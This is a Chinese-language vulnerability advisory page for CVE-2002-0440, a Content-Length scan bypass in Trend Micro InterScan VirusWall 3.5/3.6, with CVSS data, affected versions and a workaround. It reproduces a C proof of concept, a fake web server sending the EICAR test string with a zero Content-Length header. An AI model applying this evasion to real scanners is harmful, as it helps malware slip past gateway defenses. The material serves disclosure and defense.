CVE-2002-0440
CVSS7.5
发布时间 :2002-07-26 00:00:00
修订时间 :2008-09-10 15:12:04
NMCOES    

[原文]Trend Micro InterScan VirusWall HTTP proxy 3.6 with the "Skip scanning if Content-length equals 0" option enabled allows malicious web servers to bypass content scanning via a Content-length header set to 0, which is often ignored by HTTP clients.


[CNNVD]Trend Micro InterScan VirusWall Content-Length域扫描可绕过漏洞(CNNVD-200207-112)

        
        Trend Micro InterScan VirusWall是一款高性能Internet网关病毒扫描程序,可以扫描通过HTTP,SMTP和FTP入站的病毒和恶意代码。
        Trend Micro InterScan VirusWall由于对Content-length域的处理不够全面,可导致恶意代码或者病毒绕过此病毒防护墙的扫描。
        在某些版本下,存在一个称为"Skip scanning if Content-length equals 0"的选项在程序中是默认使能的。恶意WEB服务器可以返回设置了Content-length域为0的带有病毒或者恶意代码的信息给客户端,此信息就能绕过病毒防火墙的扫描,而多数流行的客户端程序会忽略这个头信息并且显示内容,这就导致嵌入恶意代码可在客户端绕过病毒防火墙的检测而执行。
        其他VirusWall可能存在此漏洞,不过没有证实过。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:trend_micro:interscan_viruswall:3.6
cpe:/a:trend_micro:interscan_viruswall:3.51

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0440
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0440
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200207-112
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/4265
(VENDOR_ADVISORY)  BID  4265
http://www.iss.net/security_center/static/8425.php
(UNKNOWN)  XF  interscan-viruswall-http-proxy-bypass(8425)
http://www.inside-security.de/vwall_cl0.html
(UNKNOWN)  MISC  http://www.inside-security.de/vwall_cl0.html
http://seclists.org/lists/bugtraq/2002/Mar/0162.html
(UNKNOWN)  BUGTRAQ  20020311 VirusWall HTTP proxy content scanning circumvention

- 漏洞信息

Trend Micro InterScan VirusWall Content-Length域扫描可绕过漏洞
高危 其他
2002-07-26 00:00:00 2005-10-20 00:00:00
远程  
        
        Trend Micro InterScan VirusWall是一款高性能Internet网关病毒扫描程序,可以扫描通过HTTP,SMTP和FTP入站的病毒和恶意代码。
        Trend Micro InterScan VirusWall由于对Content-length域的处理不够全面,可导致恶意代码或者病毒绕过此病毒防护墙的扫描。
        在某些版本下,存在一个称为"Skip scanning if Content-length equals 0"的选项在程序中是默认使能的。恶意WEB服务器可以返回设置了Content-length域为0的带有病毒或者恶意代码的信息给客户端,此信息就能绕过病毒防火墙的扫描,而多数流行的客户端程序会忽略这个头信息并且显示内容,这就导致嵌入恶意代码可在客户端绕过病毒防火墙的检测而执行。
        其他VirusWall可能存在此漏洞,不过没有证实过。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 使用VirusWall WEB管理接口在HTTP代理配置中不选择"Skip scanning if Content-length equals 0"选项。当关闭此选项时,部分站点显示会减慢,这种情况下在高级配置中的"server timeout"选项值需要配置一个较小的值。
        厂商补丁:
        Trend Micro
        -----------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.antivirus.com/

- 漏洞信息 (21339)

Trend Micro InterScan VirusWall 3.5/3.6 Content-Length Scan Bypass Vulnerability (EDBID:21339)
multiple remote
2002-03-11 Verified
0 Jochen Thomas Bauer
N/A [点击下载]
source: http://www.securityfocus.com/bid/4265/info

Trend Micro InterScan VirusWall is a high performance internet gateway virus scanning package. It is capable of scanning incoming content over HTTP, SMTP and FTP for viruses and malicious code.

A vulnerability has been reported in some versions of VirusWall. An option exists called "Skip scanning if Content-length equals 0", which is enabled by default. A malicious web server may return infected content with this header set to 0, and bypass the VirusWall scanner. As many popular client programs will ignore this header and display the content, this may allow malicious content to bypass VirusWall and still be interpreted by a client system.

Other versions of VirusWall may share this vulnerability. This has not been confirmed. 

/*
Trend Micro InterScan VirusWall HTTP proxy content scanning circumvention proof of concept code

Copyright 2002 Jochen Bauer, Inside Security IT Consulting GmbH <jtb@inside-security.de>
Compiled and tested on SuSE Linux 7.3
This program is for testing purposes only, any other use is prohibited!
*/

#include <stdio.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>

#define BUFFERSIZE 4096

int main(int argc,char *argv[])
{
  int new,dummy,n,s;
  unsigned short port;
  struct sockaddr_in remote,local; 
  struct in_addr remote_ip;
  char *remote_host,*recvbuffer,*sendbuffer;

  char header[]="HTTP/1.0 200 OK\r\nConnection: close\r\nContent-Type: application/binary\r\nContent-Length: 0\r\n\r\n";
  char eicar[]="X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*";  

  /*get port number from cmdline*/
  if(argv[1]==NULL)
    {
      printf("Usage: %s port\n",argv[0]);
      exit(1);
    }  
  else
    port=atoi(argv[1]);

  printf("Fake web server starting......\n");

  /*get a socket*/
  s=socket(AF_INET,SOCK_STREAM,6);
  if(s<0)
    {
      perror("socket");
      exit(-1);
    }
  
  /*bind socket to a local port*/
  local.sin_family=AF_INET;
  local.sin_port=htons(port);
  local.sin_addr.s_addr=htonl(INADDR_ANY);
  n=bind(s,(struct sockaddr *)&local,sizeof(struct sockaddr));
  if(n<0)
    {
      perror("bind");
      exit(-1);
    }
  
  /*initiate listening on socket*/
  n=listen(s,5);
  if(n<0)
    {
      perror("listen");
      exit(-1);
    }
  printf("Listening on port %i/tcp\n",port);
  
  /*accept connections on socket*/
  new=accept(s,(struct sockaddr *)&remote,&dummy);
  if(new<0)
    {
      perror("accept");
      exit(-1);
    }
     
  /*print connection info*/
  remote_host=(char *)calloc(24,1);
  remote_ip.s_addr=remote.sin_addr.s_addr;
  strncpy(remote_host,inet_ntoa(remote_ip),24);
  printf("connection from: %s\n",remote_host);

  /*get data*/
  recvbuffer=calloc(BUFFERSIZE,1);
  n=recv(new,recvbuffer,BUFFERSIZE,0);
  recvbuffer[n]=0; /*terminate string*/
  printf("\nData from Browser:\n"); 
  printf("%s\n",recvbuffer);

  /*send eicar virus*/
  sendbuffer=calloc(BUFFERSIZE,1);
  strcat(sendbuffer,header);
  strcat(sendbuffer,eicar);
  printf("sending: \n%s\n",sendbuffer);
  n=write(new,sendbuffer,strlen(sendbuffer));

  /*clean up*/
  printf("Terminating.\n");
  close(new);
  close(s);
  return(0);
}
		

- 漏洞信息

6162
Trend Micro InterScan VirusWall HTTP Proxy Content Scanning Circumvention
Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2002-03-10 Unknow
2002-03-10 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Trend Micro InterScan VirusWall Content-Length Scan Bypass Vulnerability
Failure to Handle Exceptional Conditions 4265
Yes No
2002-03-11 12:00:00 2009-07-11 11:56:00
Credited to Jochen Thomas Bauer <jtb@inside-security.de> and Boris Wesslowski <bw@inside-security.de> of Inside Security GmbH.

- 受影响的程序版本

Trend Micro InterScan VirusWall for Windows NT 3.51
- Microsoft Windows NT 3.5.1 SP5
- Microsoft Windows NT 3.5.1 SP4
- Microsoft Windows NT 3.5.1 SP3
- Microsoft Windows NT 3.5.1 SP2
- Microsoft Windows NT 3.5.1 SP1
- Microsoft Windows NT 3.5.1
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 3.5
Trend Micro Interscan Viruswall (Solaris) 3.6
Trend Micro Interscan Viruswall (Linux) 3.6
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- Turbolinux Turbolinux 6.1
Trend Micro Interscan Viruswall (HP-UX) 3.6

- 漏洞讨论

Trend Micro InterScan VirusWall is a high performance internet gateway virus scanning package. It is capable of scanning incoming content over HTTP, SMTP and FTP for viruses and malicious code.

A vulnerability has been reported in some versions of VirusWall. An option exists called "Skip scanning if Content-length equals 0", which is enabled by default. A malicious web server may return infected content with this header set to 0, and bypass the VirusWall scanner. As many popular client programs will ignore this header and display the content, this may allow malicious content to bypass VirusWall and still be interpreted by a client system.

Other versions of VirusWall may share this vulnerability. This has not been confirmed.

- 漏洞利用

No exploit is required.

A demo server has been provided by Inside Security GmbH:

http://www.inside-security.de/vwall_cl0_poc.html

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站